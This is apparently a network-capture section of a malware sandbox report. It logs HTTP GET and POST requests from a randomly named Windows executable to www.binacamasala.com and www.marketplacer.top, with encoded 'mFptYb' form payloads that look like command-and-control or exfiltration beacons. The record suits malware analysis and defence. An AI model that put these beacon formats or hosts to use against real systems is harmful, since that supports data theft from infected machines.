                                                                                                                            Data Ascii: mFptYb=eiruA313dcwG043UNxC6gbmME456ozvWJxt5vfrPfmMYIWHC2xAxvM7/mn7DAey4WCl47DnMm/iyNGF6xuZwmrc/snproSqxrgS/RbYhxjEO3RNu9uKUwFKZoye8l/JUR0IIspvKfKDfo0LaGs6lc/fphOAQaiFlFSktfHOvt0JX6bFthJSH4co0qETnzYvDE6bZWTwTb4DeCkZReKWw1g0Fhe1ulkJs4ntEZzi7C6vKI58wNJlHxMPJw9s6WT2xbXju/oGTOuQgYnQ5udtQjJrfQHQCMTNVmBpcGFLBnWvcglLLwMsoyHytH6aZP46AshhvSf+c1jsdtBZI+Qx7A7saTuoyvUCvYc+H2447giHgKrbjqKlj9JbGTd0pYdGZVLWUAzI+Sl7LQ2BD1MMqPgH97zzH67LQt6lyQglcIQVtQiPc5zPbX/157STmEcElW9tzTEDEIH/SXhgjYgm2iHE+HlrReu14942O/hhZFoClA82QxjaZLb08dv8FfQrrGKwBdYOrsu3RCnMwDZUdiKHkd1R0ok/KSRDpJ2pnnLt3sYLcgdobdT6wHwjX4nGuegc/7KbSoT12mXtw+KP4uQg5H3tF4VsJ2SUJefa4Oh8GmUjlXfFPHFfrGyRpLSGCcEyfZnpq9LXY89DHKhqzDkeNFDdC+WeV7NmM3n8tfdH87NO9dpeHntnuiCEjQDOXBu3zEHJciSp6RQJb1dTqKEmzpTx2AXpLfWDDTwpyPgfcuOHGoP79u6RT0vkmIkM0YJ2HURg+p2W+3Ea9SbGe6dxcvEQyA9M0z2IP0oaRWGMnssakHaAqJWacWygck010BTrcVCAJBZW0KYioeDpu0nNqGMnJ+RAQzB1NoCCAfU4DFaSLOL35BbmpKcJvPHLgup9EKqQXUpnJt+RMySmRxrLIAzEZUtjE4FZIzs9Ax+kWowUj1DgH/mvL2if8IWTw47CWPB62m26HWLX4HxTFvptzmGbLWvg7gxNa8W43OYyFW [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:41.822474957 CET1755OUTData Raw: 45 38 75 31 49 57 35 49 33 41 42 45 6f 41 31 76 55 6f 76 74 7a 70 49 51 31 36 59 49 44 71 38 63 47 62 2b 2f 48 4c 76 61 4a 58 69 46 66 59 4b 6c 38 6d 6a 6c 36 72 49 52 50 30 68 4d 58 6d 30 43 6e 71 45 68 45 4f 72 4b 44 4e 56 50 63 77 33 4e 48 75
                                                                                                                            Data Ascii: E8u1IW5I3ABEoA1vUovtzpIQ16YIDq8cGb+/HLvaJXiFfYKl8mjl6rIRP0hMXm0CnqEhEOrKDNVPcw3NHuiQB3+6k9sfweEjvOGNbT/5+D+jkUOop6ePb0gN8G6BGzi5/wKHRZXayMm4U50HA3eP4yHJaAwy0xyL9LMhVuo2iuKF/SoZ4s61/Oc8pN8JO9CVqUG65Tuc/nnSyiCMPovd08PYo75DVo+0+rPuoCwJcVYxbTmX2gH


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.224917015.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:44.360196114 CET534OUTGET /usv6/?mFptYb=TgDODAIJaOl5jtT4JVTY+PvwOqFRmlbaFilQ+MjMe2d3S0GP4FMVqMWCvgzOI+CNdjxuqTDbs8bnZHFVmt5Iw+xv7nFgog653DC3dJxayAsmz1wZ3Pvz+hOxoHiw&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.binacamasala.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:50:44.980684996 CET402INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:44 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 262
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 46 70 74 59 62 3d 54 67 44 4f 44 41 49 4a 61 4f 6c 35 6a 74 54 34 4a 56 54 59 2b 50 76 77 4f 71 46 52 6d 6c 62 61 46 69 6c 51 2b 4d 6a 4d 65 32 64 33 53 30 47 50 34 46 4d 56 71 4d 57 43 76 67 7a 4f 49 2b 43 4e 64 6a 78 75 71 54 44 62 73 38 62 6e 5a 48 46 56 6d 74 35 49 77 2b 78 76 37 6e 46 67 6f 67 36 35 33 44 43 33 64 4a 78 61 79 41 73 6d 7a 31 77 5a 33 50 76 7a 2b 68 4f 78 6f 48 69 77 26 56 74 61 3d 6e 46 79 70 75 44 74 68 6f 6c 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mFptYb=TgDODAIJaOl5jtT4JVTY+PvwOqFRmlbaFilQ+MjMe2d3S0GP4FMVqMWCvgzOI+CNdjxuqTDbs8bnZHFVmt5Iw+xv7nFgog653DC3dJxayAsmz1wZ3Pvz+hOxoHiw&Vta=nFypuDtholF"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.2249171194.58.112.17480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:50.041954994 CET2472OUTPOST /xprp/ HTTP/1.1
                                                                                                                            Host: www.marketplacer.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.marketplacer.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.marketplacer.top/xprp/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 39 6f 7a 45 55 36 4f 49 4b 7a 57 30 41 41 6c 47 4f 68 73 77 61 6c 52 31 56 5a 38 6f 4b 35 44 52 67 65 4d 54 55 72 6d 33 71 43 51 6e 45 75 4f 42 75 4a 74 67 4f 43 61 72 77 49 67 31 78 61 4b 64 71 63 73 45 66 44 30 6f 6e 49 58 39 56 44 65 4c 44 39 38 45 59 45 73 31 73 61 6b 2b 76 39 68 30 70 6e 59 52 76 72 54 32 4f 64 68 58 44 66 47 4a 4a 41 45 6b 42 4c 4e 78 49 39 52 65 41 78 70 77 71 45 34 32 2f 6f 43 75 65 34 32 2f 6e 79 51 2f 52 73 38 4f 63 47 43 6b 79 39 6a 66 71 66 31 64 6d 42 45 74 68 64 49 44 42 35 61 64 31 6a 65 38 6e 50 39 34 35 6f 51 70 68 43 4c 79 7a 6d 6d 4e 53 31 33 7a 57 6e 31 32 63 6c 6f 36 6c 2b 62 6e 76 48 4e 31 61 6e 72 35 72 66 75 35 77 2b 4f 75 35 38 56 6a 4a 74 51 34 2f 56 46 36 2b 6a 33 59 5a 6a 38 61 66 7a 48 36 72 4c 67 52 68 30 56 37 6f 2b 68 64 67 32 4d 49 6b 6f 6d 36 71 38 6c 31 51 4c 68 70 49 67 30 4e 56 67 6e 35 38 34 6a 4e 74 53 58 6a 77 53 75 31 73 38 65 47 45 30 56 53 71 34 4c 52 44 31 76 43 57 6d 39 75 7a 64 62 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=Yv4rZANXzXyi9ozEU6OIKzW0AAlGOhswalR1VZ8oK5DRgeMTUrm3qCQnEuOBuJtgOCarwIg1xaKdqcsEfD0onIX9VDeLD98EYEs1sak+v9h0pnYRvrT2OdhXDfGJJAEkBLNxI9ReAxpwqE42/oCue42/nyQ/Rs8OcGCky9jfqf1dmBEthdIDB5ad1je8nP945oQphCLyzmmNS13zWn12clo6l+bnvHN1anr5rfu5w+Ou58VjJtQ4/VF6+j3YZj8afzH6rLgRh0V7o+hdg2MIkom6q8l1QLhpIg0NVgn584jNtSXjwSu1s8eGE0VSq4LRD1vCWm9uzdbY2lELV26IP9KlC9Khwf0ZZOuWbddoPvtnxh4DKkaPRkD39fEZoSk5PTyy9Ep7FJbITuT7L7uWNi+JpeCSzNviLGl8L5gZOmqVuN6MaV3JPw14y14c7r2YA6vaqi5/qmgB7+NACHo6qhq3IHi9hdK/EydCgdbbSesV6lixRXXkqHvU7Ptti6IWT1BBCN/ZGnOvcmOnrmDJx/tbaRrhdvz9hqr5yCWYQoDVvOqQycrLVTH0BvGQ0pQR9RJcr4jIR+/A+T7tngU6HaLU8jvK3LIDgqcz3O4kn88g3BDdaSOgJBwMg9Y2GRbO02bBxTofOSuX3XwjoXi7a0H7IMvUIRj68y43gRHFlMMyFP4bSqfB5gLqh9320VdnnO6PB1RoPlklE9ePO0UcMCQsUOy0TTgCzM+xYfKyyRig9iYIM/EXNylIOSQD5oqZwlI4bWcXt6YsR/vity0SVkX45Kwg0hre4KQ3e2PI0HpTeGUB5jkZQB+b1L9RnnEs1qDw1QV9cXnUTvhVsPXXW3MhjANz7dMjEAT/XSDp2hRFp0UER+aSnZvc5khdi0t5VIDeKpK6m9FobfzK3L8mCwGjogE4Uirfy1BBwkQoTwovZkbzUj2jq7s+IKTDM/6KccEHXXB7KaqNo7j1FzBNt04ns4CXO5RgAnpcxk4DbGuvu [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:50.049612045 CET291OUTData Raw: 71 65 6d 78 78 4f 75 51 47 52 49 61 76 73 6d 34 39 30 35 6f 6d 4c 75 73 65 65 68 39 70 39 6c 33 59 75 35 66 76 64 32 4a 61 35 73 51 76 5a 4e 7a 45 73 71 70 64 6a 34 4b 51 64 30 5a 32 57 56 70 58 70 4c 4e 6c 63 70 70 76 73 75 4e 5a 79 30 4c 54 43
                                                                                                                            Data Ascii: qemxxOuQGRIavsm4905omLuseeh9p9l3Yu5fvd2Ja5sQvZNzEsqpdj4KQd0Z2WVpXpLNlcppvsuNZy0LTCQScWLXjNI2LI4W0Lvcgu2XDcXh6LTJLqxSHhT069N1XD92Uiii5WK/r7hyXJXrl9CCfJfAANeyS/tlmjU2zIsU+kIX4nYv5bZneDvQZzfXVjjmBevoFsJWY6kqnAZWvJqaPVN4tG8NluwRj5SEiBGhUJK/2vdxTHB
                                                                                                                            Nov 7, 2024 10:50:50.922560930 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:50 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED]
                                                                                                                            Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$|thTB%;@i)b/:gj2{A$0*@HuAlOHzkt*jBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^|gS^wmIeG4(pSBRa"|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#|N>C%w}z|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~*pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 |\JzPAY'/4;@L>M&Mn~e(ab8$&n*"tR\,}oCQMRA [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:50.922580004 CET1236INData Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f
                                                                                                                            Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
                                                                                                                            Nov 7, 2024 10:50:50.922591925 CET424INData Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8
                                                                                                                            Data Ascii: /l*)/,/z~}z]@BN-*mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
                                                                                                                            Nov 7, 2024 10:50:50.922602892 CET646INData Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b
                                                                                                                            Data Ascii: ZaY&S|\VLUDpuv`\fA.B|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            11192.168.2.2249172194.58.112.17480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:52.585923910 CET802OUTPOST /xprp/ HTTP/1.1
                                                                                                                            Host: www.marketplacer.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.marketplacer.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.marketplacer.top/xprp/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 39 76 76 45 57 72 4f 49 49 54 57 30 48 41 6c 47 41 78 73 32 61 6c 4d 41 56 59 6f 34 4b 71 7a 52 68 4b 49 54 55 5a 2b 33 76 43 51 6d 63 65 4f 46 7a 35 73 67 4f 43 61 64 77 49 73 31 78 5a 32 64 37 4f 45 45 5a 48 67 76 76 59 58 46 64 6a 65 77 44 39 77 6e 59 45 67 66 73 65 67 2b 76 2b 31 30 6f 6e 6f 52 70 4a 4c 32 46 4e 68 52 4c 2f 47 34 4a 41 34 4c 42 4c 64 35 49 39 39 65 48 44 4e 77 71 51 73 32 70 76 32 75 51 59 32 79 75 53 52 68 43 2f 46 53 52 55 57 52 38 74 2f 54 71 4f 46 4f 75 69 77 59 6a 63 67 31 42 70 62 79 71 32 54 4c 7a 39 64 77 70 51 3d 3d
                                                                                                                            Data Ascii: mFptYb=Yv4rZANXzXyi9vvEWrOIITW0HAlGAxs2alMAVYo4KqzRhKITUZ+3vCQmceOFz5sgOCadwIs1xZ2d7OEEZHgvvYXFdjewD9wnYEgfseg+v+10onoRpJL2FNhRL/G4JA4LBLd5I99eHDNwqQs2pv2uQY2yuSRhC/FSRUWR8t/TqOFOuiwYjcg1Bpbyq2TLz9dwpQ==
                                                                                                                            Nov 7, 2024 10:50:53.461095095 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED]
                                                                                                                            Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$|thTB%;@i)b/:gj2{A$0*@HuAlOHzkt*jBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^|gS^wmIeG4(pSBRa"|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#|N>C%w}z|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~*pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 |\JzPAY'/4;@L>M&Mn~e(ab8$&n*"tR\,}oCQMRA [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:53.461122990 CET1236INData Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f
                                                                                                                            Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
                                                                                                                            Nov 7, 2024 10:50:53.461134911 CET424INData Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8
                                                                                                                            Data Ascii: /l*)/,/z~}z]@BN-*mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
                                                                                                                            Nov 7, 2024 10:50:53.461173058 CET646INData Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b
                                                                                                                            Data Ascii: ZaY&S|\VLUDpuv`\fA.B|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            12192.168.2.2249173194.58.112.17480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:55.128864050 CET2472OUTPOST /xprp/ HTTP/1.1
                                                                                                                            Host: www.marketplacer.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.marketplacer.top
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.marketplacer.top/xprp/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 38 50 66 45 51 49 6d 49 44 54 57 31 43 41 6c 47 4f 68 73 79 61 6c 51 41 56 5a 38 6f 4b 34 66 52 67 62 59 54 61 62 6d 33 74 43 51 6d 61 65 4f 42 75 4a 74 68 4f 43 50 6d 77 4a 63 6c 78 66 47 64 71 64 73 45 66 45 49 6f 67 49 58 39 5a 6a 65 7a 44 39 78 6c 59 45 77 68 73 65 55 41 76 2b 74 30 6f 53 63 52 76 35 4c 35 41 4e 68 52 4c 2f 47 4f 4a 41 34 7a 42 4c 46 68 49 38 6c 4f 41 79 39 77 72 30 34 32 6f 49 43 78 57 59 32 32 6a 79 51 59 52 74 41 5a 63 47 43 67 79 39 47 77 71 66 4a 64 6b 53 4d 74 68 61 63 41 4f 4a 61 63 6f 7a 65 38 36 2f 39 36 35 6f 51 6c 68 43 4c 79 7a 6e 61 4e 55 6c 33 7a 57 69 4a 35 42 31 6f 36 6f 65 62 6d 68 6e 52 68 61 6e 75 31 72 65 66 47 77 4a 32 75 72 4f 39 6a 66 4e 51 34 35 6c 45 51 2b 6a 33 46 54 44 38 77 66 77 33 59 72 50 4d 2f 68 30 56 37 6f 39 70 64 78 55 6b 49 79 49 6d 36 79 4d 6c 30 4a 62 68 71 49 67 67 2f 56 6b 76 35 38 35 37 4e 73 6c 7a 6a 34 77 47 32 34 63 66 68 41 30 56 48 35 6f 4c 41 44 32 4c 38 57 6d 31 55 7a 63 72 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=Yv4rZANXzXyi8PfEQImIDTW1CAlGOhsyalQAVZ8oK4fRgbYTabm3tCQmaeOBuJthOCPmwJclxfGdqdsEfEIogIX9ZjezD9xlYEwhseUAv+t0oScRv5L5ANhRL/GOJA4zBLFhI8lOAy9wr042oICxWY22jyQYRtAZcGCgy9GwqfJdkSMthacAOJacoze86/965oQlhCLyznaNUl3zWiJ5B1o6oebmhnRhanu1refGwJ2urO9jfNQ45lEQ+j3FTD8wfw3YrPM/h0V7o9pdxUkIyIm6yMl0JbhqIgg/Vkv5857Nslzj4wG24cfhA0VH5oLAD2L8Wm1UzcrY2j4LTTWIONKmPdKl0f4FZO24bbBSPtZnx0UDdWiMNkDt4fEHsSkfPTmQ9EJ7G7rIQuz7MKvkLS+C4uDS5tvPLGg8L7YJO0CVv96MY3PKVA0yol4K0L3XA6vkqjZFq18B7+dAFUQ6qhqwNHi76tOREyBOgdXLSYAV60SxRWXkmHvUjfsE5qIcT1l7CMWiFXqvfFWnpkbJhvtdJhrkZvydhq75yGXdQobVvvqQy9rLBjHwIPGL0pQ39RN5r4TyR8rA+XPt2RU6P6LV6jvO9rIZgqVo3OsKn5Yg4AjdYjOgIhwKi9Y2fBbs03//xS1qOW6XwmgjgXi4UUH4HsvXMRi/8yo3gRDFlN4yC+4bVZ3BwwLsiN3W+1QInOKDB0l4PnglFsePJ2sfQCQQfuzaFThXzM/lYd6YuwCg9y4IfKoUAylPEyQU0IrkwkkSbWoHsNwsR+fitBMSWUX45Kwh0hra4NZGezzm0HpTeXUB5XEZIx+e5r9atHEy1qHG1Q9XcRTUBK1VsPXUYnMi7QNy7dBxEATdXSPp2R5FrhAEIcySk5vc+khasUt6VIDOKsmqm8FoarPKiPcnaQGiugEQayX6y19jwhQoTHIvY1bzUz2jpbs9CqTWCf3OccYtXWRrKr6NpMP1HxpMlk4mjYCZO4sUAnwwxlA5bFuvv [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:55.134155989 CET1755OUTData Raw: 76 79 6d 78 77 75 75 52 6c 35 49 61 50 73 68 39 4e 30 6b 6f 6d 4c 4b 73 61 7a 63 39 74 6b 2b 33 66 57 35 64 4f 39 32 61 39 6c 73 5a 2f 5a 54 7a 45 74 6e 74 64 66 64 4b 51 64 47 5a 33 69 56 70 54 4e 4c 4e 6e 6b 70 70 2f 73 74 47 4a 79 78 66 44 43
